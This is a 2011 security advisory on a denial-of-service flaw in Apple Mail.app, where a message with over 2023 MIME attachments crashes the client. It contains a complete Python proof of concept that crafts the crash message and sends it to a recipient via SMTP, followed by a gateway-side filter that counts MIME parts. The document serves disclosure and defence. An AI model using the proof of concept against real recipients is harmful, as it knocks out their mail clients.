Release date: 2011-11-01
Updated on: 2011-11-01
Affected Systems:
Apple Mac OS X 10.7.2
Apple Mail 5.1
Description:
--------------------------------------------------------------------------------
Mail.app is the email program included with Apple's Mac OS X operating system.
The Mail.app email client has a denial of service vulnerability in its implementation. By sending the Mail client a message containing more than 2023 MIME attachments, an attacker can cause the client to crash while parsing it.
<* Source: shebang42
Link: http://seclists.org/bugtraq/2011/Oct/214
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
shebang42 provides the following test method:
#!/usr/bin/env python
# Mail of death for Apple's Mail.app
#
# Tested & vulnerable: Leopard/Intel, Snow Leopard, Lion (up to 10.7.2), iOS 4.2.x, 4.3.3
# Tested != vulnerable: Leopard/PPC
# Create mail with n_attach MIME attachments
# Version 1.0; shebang42

import smtplib

n_attach = 2040  # ~2024 is sufficient
relay = 'ur.mta.goes.here'
mailfrom = 'mail_of_death () example com'
mailto = mailfrom
subject = 'PoC Apple Mail.app mail of death'
date = 'October 29, 2011 10:00:00 GMT'

def craft_mail():
    # Top-level headers declaring a multipart/mixed message with boundary "delim"
    header = ('From: %s\nTo: %s\nSubject: %s\nDate: %s\n'
              'Content-Type: multipart/mixed; boundary="delim"\n\n'
              % (mailfrom, mailto, subject, date))
    # One ordinary text part, followed by n_attach empty inline parts
    body = '--delim\nContent-Type: text/plain\nContent-Disposition: inline\n\nHello World\nBye Mail.app\n\n'
    attach = '--delim\nContent-Disposition: inline\n\n' * n_attach
    ### Another, slightly longer option to crash Mail.app (same bug)
    # attach = '--delim\nContent-Type: text/plain\nContent-Disposition: attachment; filename=AAAAAAAA\n\ncontent\n' * n_attach
    return header + body + attach

def send_mail(mail):
    server = smtplib.SMTP(relay)
    server.sendmail(mailfrom, mailto, mail)
    server.quit()

mail = craft_mail()
# print(mail)
send_mail(mail)
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apple
-----
Currently, the vendor does not provide patches or upgrade programs. Users of the software should watch the vendor's homepage for the latest version:
http://support.apple.com/
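
While no vendor fix is available, mail can be screened before it reaches the client. The following is an added example, not part of the original advisory or of shebang42's code: a Python check for a mail gateway that counts the MIME parts of a message and flags it when the count exceeds a limit. The function names, the sample message and the limit of 1000 are assumptions.

```python
# Added example: gateway-side screen for messages with an excessive MIME part count.
import email
from email import policy

# Assumption: a limit well below the roughly 2024 parts the advisory reports as sufficient.
MAX_PARTS = 1000

def count_mime_parts(raw: bytes) -> int:
    """Count leaf (non-multipart) parts, including parts inside nested multiparts."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return sum(1 for part in msg.walk() if not part.is_multipart())

def should_quarantine(raw: bytes, max_parts: int = MAX_PARTS) -> bool:
    """Return True when the message carries more parts than the gateway allows."""
    try:
        return count_mime_parts(raw) > max_parts
    except Exception:
        # Fail closed: a message the parser cannot handle is held for review.
        return True

# Constructed sample: an ordinary message with one text part and two attachments.
SAMPLE = (
    b'From: alice@example.com\n'
    b'To: bob@example.com\n'
    b'Subject: report\n'
    b'Content-Type: multipart/mixed; boundary="delim"\n'
    b'\n'
    b'--delim\n'
    b'Content-Type: text/plain\n'
    b'\n'
    b'Hello\n'
    b'--delim\n'
    b'Content-Type: application/octet-stream\n'
    b'Content-Disposition: attachment; filename=a.bin\n'
    b'\n'
    b'data\n'
    b'--delim\n'
    b'Content-Type: application/octet-stream\n'
    b'Content-Disposition: attachment; filename=b.bin\n'
    b'\n'
    b'data\n'
    b'--delim--\n'
)

if __name__ == "__main__":
    print(count_mime_parts(SAMPLE), should_quarantine(SAMPLE))
```

Parts without a closing boundary or with an empty body are still counted, so the check does not depend on the message being well formed.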